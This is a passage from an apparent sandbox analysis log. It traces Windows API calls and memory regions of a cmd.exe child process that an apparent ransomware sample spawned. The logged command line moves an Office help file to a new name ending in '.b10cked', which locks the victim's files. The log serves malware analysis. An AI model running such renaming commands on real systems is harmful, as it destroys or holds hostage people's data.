lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0201.816] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0201.816] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0201.816] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0201.816] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0201.816] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0201.816] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0201.816] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0201.816] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0201.816] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0201.816] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0201.816] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0201.816] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0201.816] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0201.816] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0201.816] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0201.816] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0201.817] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0201.817] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0201.817] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0201.817] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0201.817] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0201.817] _wcsnicmp 
(_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0201.817] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0201.817] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0201.817] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0201.817] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0201.817] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0201.817] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0201.817] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0201.817] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0201.817] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0201.817] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0201.817] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0201.817] _wcsicmp (_String1="MSMSAC~1.HXN", _String2=".") returned 63 [0201.817] _wcsicmp (_String1="MSMSAC~1.HXN", _String2="..") returned 63 [0201.817] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msmsac~1.hxn")) returned 0x2022 [0201.818] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1a1e48 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0201.818] SetErrorMode (uMode=0x0) returned 0x0 [0201.818] SetErrorMode (uMode=0x1) returned 0x0 [0201.818] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~1.HXN", nBufferLength=0x104, lpBuffer=0x14ebdc, lpFilePart=0x14ebc4 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~1.HXN", lpFilePart=0x14ebc4*="MSMSAC~1.HXN") returned 0x27 [0201.818] SetErrorMode (uMode=0x0) returned 0x1 [0201.818] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: 
"c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0201.818] _wcsicmp (_String1="MSMSAC~1.HXN", _String2=".") returned 63 [0201.818] _wcsicmp (_String1="MSMSAC~1.HXN", _String2="..") returned 63 [0201.818] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msmsac~1.hxn")) returned 0x2022 [0201.818] SetErrorMode (uMode=0x0) returned 0x0 [0201.818] SetErrorMode (uMode=0x1) returned 0x0 [0201.818] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~1.HXN", nBufferLength=0x104, lpBuffer=0x14f058, lpFilePart=0x14edf0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~1.HXN", lpFilePart=0x14edf0*="MSMSAC~1.HXN") returned 0x27 [0201.818] SetErrorMode (uMode=0x0) returned 0x1 [0201.818] SetErrorMode (uMode=0x0) returned 0x0 [0201.818] SetErrorMode (uMode=0x1) returned 0x0 [0201.818] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSACCESS.14.1033.hxn.b10cked", nBufferLength=0x104, lpBuffer=0x14f260, lpFilePart=0x14edf0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSACCESS.14.1033.hxn.b10cked", lpFilePart=0x14edf0*="MS.MSACCESS.14.1033.hxn.b10cked") returned 0x3a [0201.818] SetErrorMode (uMode=0x0) returned 0x1 [0201.818] SetLastError (dwErrCode=0x0) [0201.818] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSACCESS.14.1033.hxn.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\ms.msaccess.14.1033.hxn.b10cked")) returned 0xffffffff [0201.818] GetLastError () returned 0x2 [0201.818] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x14e76c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14e76c) returned 0x190e78 [0201.819] FindNextFileW (in: hFindFile=0x190e78, lpFindFileData=0x14e76c | out: lpFindFileData=0x14e76c) returned 0 [0201.819] FindClose (in: hFindFile=0x190e78 | out: hFindFile=0x190e78) returned 1 [0201.819] GetLastError () 
returned 0x12 [0201.819] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x14e76c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14e76c) returned 0x190e78 [0201.820] FindNextFileW (in: hFindFile=0x190e78, lpFindFileData=0x14e76c | out: lpFindFileData=0x14e76c) returned 0 [0201.820] FindClose (in: hFindFile=0x190e78 | out: hFindFile=0x190e78) returned 1 [0201.820] GetLastError () returned 0x12 [0201.820] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x1a1be8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1a1be8) returned 0x190e78 [0201.821] FindNextFileW (in: hFindFile=0x190e78, lpFindFileData=0x1a1be8 | out: lpFindFileData=0x1a1be8) returned 0 [0201.821] FindClose (in: hFindFile=0x190e78 | out: hFindFile=0x190e78) returned 1 [0201.821] GetLastError () returned 0x12 [0201.821] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x1a1be8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1a1be8) returned 0x190e78 [0201.821] FindNextFileW (in: hFindFile=0x190e78, lpFindFileData=0x1a1be8 | out: lpFindFileData=0x1a1be8) returned 0 [0201.821] FindClose (in: hFindFile=0x190e78 | out: hFindFile=0x190e78) returned 1 [0201.821] GetLastError () returned 0x12 [0201.821] _get_osfhandle (_FileHandle=2) returned 0xb [0201.821] GetFileType (hFile=0xb) returned 0x2 [0201.933] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0201.933] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14e93c | out: lpMode=0x14e93c) returned 1 [0201.933] _get_osfhandle (_FileHandle=2) returned 0xb [0201.933] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x14e970 | out: lpConsoleScreenBufferInfo=0x14e970) returned 1 [0201.933] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, 
dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0201.934] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x14e9b0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0201.934] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x14e994, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x14e994*=0x2c) returned 1 [0201.935] longjmp () [0201.935] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.935] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0201.935] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.935] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0201.935] _get_osfhandle (_FileHandle=0) returned 0x3 [0201.935] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0201.935] SetConsoleInputExeNameW () returned 0x1 [0201.935] GetConsoleOutputCP () returned 0x1b5 [0201.935] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0201.935] SetThreadUILanguage (LangId=0x0) returned 0x409 [0201.936] exit (_Code=1) Process: id = "465" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16980" os_pid = "0xd1c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSACCESS.DEV.14.1033.hxn.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], 
"BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29236 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29237 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 29238 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 29239 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 29240 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29241 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29242 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29243 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29244 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 29245 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = 
"private_0x000000007ffdf000" filename = "" Region: id = 29734 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 29735 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 29736 start_va = 0x1b0000 end_va = 0x216fff entry_point = 0x1b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 29737 start_va = 0x310000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 29738 start_va = 0x5e0000 end_va = 0x5effff entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 29739 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 29740 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 29741 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 29742 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 29743 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: 
"c:\\windows\\system32\\msvcrt.dll") Region: id = 29744 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 29745 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 29746 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 29747 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 29748 start_va = 0x220000 end_va = 0x2e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 29749 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 29750 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 29751 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 29752 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 29753 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 29754 start_va = 0x80000 end_va = 0x80fff entry_point = 
0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 29755 start_va = 0x410000 end_va = 0x510fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 29756 start_va = 0x5f0000 end_va = 0x11effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 29757 start_va = 0x11f0000 end_va = 0x1352fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011f0000" filename = "" Region: id = 29977 start_va = 0x520000 end_va = 0x5dffff entry_point = 0x520000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 661 os_tid = 0xd28 [0202.174] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1afac4 | out: lpSystemTimeAsFileTime=0x1afac4*(dwLowDateTime=0xad513ca0, dwHighDateTime=0x1d440a9)) [0202.175] GetCurrentProcessId () returned 0xd1c [0202.175] GetCurrentThreadId () returned 0xd28 [0202.175] GetTickCount () returned 0x39117 [0202.175] QueryPerformanceCounter (in: lpPerformanceCount=0x1afabc | out: lpPerformanceCount=0x1afabc*=25896379051) returned 1 [0202.175] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0202.175] __set_app_type (_Type=0x1) [0202.175] __p__fmode () returned 0x76b331f4 [0202.175] __p__commode () returned 0x76b331fc [0202.175] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0202.175] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0202.175] GetCurrentThreadId () returned 0xd28 [0202.176] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd28) returned 0x38 [0202.176] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0202.176] 
GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0202.176] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.176] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0202.176] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1afa54 | out: phkResult=0x1afa54*=0x0) returned 0x2 [0202.176] VirtualQuery (in: lpAddress=0x1afa8b, lpBuffer=0x1afa24, dwLength=0x1c | out: lpBuffer=0x1afa24*(BaseAddress=0x1af000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0202.176] VirtualQuery (in: lpAddress=0xb0000, lpBuffer=0x1afa24, dwLength=0x1c | out: lpBuffer=0x1afa24*(BaseAddress=0xb0000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0202.176] VirtualQuery (in: lpAddress=0xb1000, lpBuffer=0x1afa24, dwLength=0x1c | out: lpBuffer=0x1afa24*(BaseAddress=0xb1000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0202.176] VirtualQuery (in: lpAddress=0xb3000, lpBuffer=0x1afa24, dwLength=0x1c | out: lpBuffer=0x1afa24*(BaseAddress=0xb3000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0202.176] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x1afa24, dwLength=0x1c | out: lpBuffer=0x1afa24*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0202.176] GetConsoleOutputCP () returned 0x1b5 [0202.176] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.176] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0202.176] _get_osfhandle 
(_FileHandle=1) returned 0x7 [0202.176] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0202.176] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.176] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0202.177] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.177] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0202.177] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.177] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0202.177] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.177] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0202.177] GetEnvironmentStringsW () returned 0x320198* [0202.177] FreeEnvironmentStringsW (penv=0x320198) returned 1 [0202.177] GetEnvironmentStringsW () returned 0x320198* [0202.177] FreeEnvironmentStringsW (penv=0x320198) returned 1 [0202.177] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ae9c4 | out: phkResult=0x1ae9c4*=0x40) returned 0x0 [0202.178] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ae9cc, lpData=0x1ae9d0, lpcbData=0x1ae9c8*=0x1000 | out: lpType=0x1ae9cc*=0x0, lpData=0x1ae9d0*=0xc0, lpcbData=0x1ae9c8*=0x1000) returned 0x2 [0202.178] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ae9cc, lpData=0x1ae9d0, lpcbData=0x1ae9c8*=0x1000 | out: lpType=0x1ae9cc*=0x4, lpData=0x1ae9d0*=0x1, lpcbData=0x1ae9c8*=0x4) returned 0x0 [0202.178] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ae9cc, lpData=0x1ae9d0, lpcbData=0x1ae9c8*=0x1000 | out: lpType=0x1ae9cc*=0x0, lpData=0x1ae9d0*=0x1, lpcbData=0x1ae9c8*=0x1000) returned 0x2 [0202.178] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ae9cc, lpData=0x1ae9d0, lpcbData=0x1ae9c8*=0x1000 | out: 
lpType=0x1ae9cc*=0x4, lpData=0x1ae9d0*=0x0, lpcbData=0x1ae9c8*=0x4) returned 0x0 [0202.178] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ae9cc, lpData=0x1ae9d0, lpcbData=0x1ae9c8*=0x1000 | out: lpType=0x1ae9cc*=0x4, lpData=0x1ae9d0*=0x40, lpcbData=0x1ae9c8*=0x4) returned 0x0 [0202.178] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ae9cc, lpData=0x1ae9d0, lpcbData=0x1ae9c8*=0x1000 | out: lpType=0x1ae9cc*=0x4, lpData=0x1ae9d0*=0x40, lpcbData=0x1ae9c8*=0x4) returned 0x0 [0202.178] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ae9cc, lpData=0x1ae9d0, lpcbData=0x1ae9c8*=0x1000 | out: lpType=0x1ae9cc*=0x0, lpData=0x1ae9d0*=0x40, lpcbData=0x1ae9c8*=0x1000) returned 0x2 [0202.178] RegCloseKey (hKey=0x40) returned 0x0 [0202.178] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ae9c4 | out: phkResult=0x1ae9c4*=0x40) returned 0x0 [0202.178] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ae9cc, lpData=0x1ae9d0, lpcbData=0x1ae9c8*=0x1000 | out: lpType=0x1ae9cc*=0x0, lpData=0x1ae9d0*=0x40, lpcbData=0x1ae9c8*=0x1000) returned 0x2 [0202.178] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ae9cc, lpData=0x1ae9d0, lpcbData=0x1ae9c8*=0x1000 | out: lpType=0x1ae9cc*=0x4, lpData=0x1ae9d0*=0x1, lpcbData=0x1ae9c8*=0x4) returned 0x0 [0202.178] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ae9cc, lpData=0x1ae9d0, lpcbData=0x1ae9c8*=0x1000 | out: lpType=0x1ae9cc*=0x0, lpData=0x1ae9d0*=0x1, lpcbData=0x1ae9c8*=0x1000) returned 0x2 [0202.178] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ae9cc, lpData=0x1ae9d0, lpcbData=0x1ae9c8*=0x1000 | out: lpType=0x1ae9cc*=0x4, lpData=0x1ae9d0*=0x0, lpcbData=0x1ae9c8*=0x4) 
returned 0x0 [0202.178] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ae9cc, lpData=0x1ae9d0, lpcbData=0x1ae9c8*=0x1000 | out: lpType=0x1ae9cc*=0x4, lpData=0x1ae9d0*=0x9, lpcbData=0x1ae9c8*=0x4) returned 0x0 [0202.178] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ae9cc, lpData=0x1ae9d0, lpcbData=0x1ae9c8*=0x1000 | out: lpType=0x1ae9cc*=0x4, lpData=0x1ae9d0*=0x9, lpcbData=0x1ae9c8*=0x4) returned 0x0 [0202.178] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ae9cc, lpData=0x1ae9d0, lpcbData=0x1ae9c8*=0x1000 | out: lpType=0x1ae9cc*=0x0, lpData=0x1ae9d0*=0x9, lpcbData=0x1ae9c8*=0x1000) returned 0x2 [0202.178] RegCloseKey (hKey=0x40) returned 0x0 [0202.178] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a4 [0202.178] srand (_Seed=0x5b8863a4) [0202.178] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSACCESS.DEV.14.1033.hxn.b10cked\"" [0202.178] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSACCESS.DEV.14.1033.hxn.b10cked\"" [0202.178] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.179] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3218f8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0202.179] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 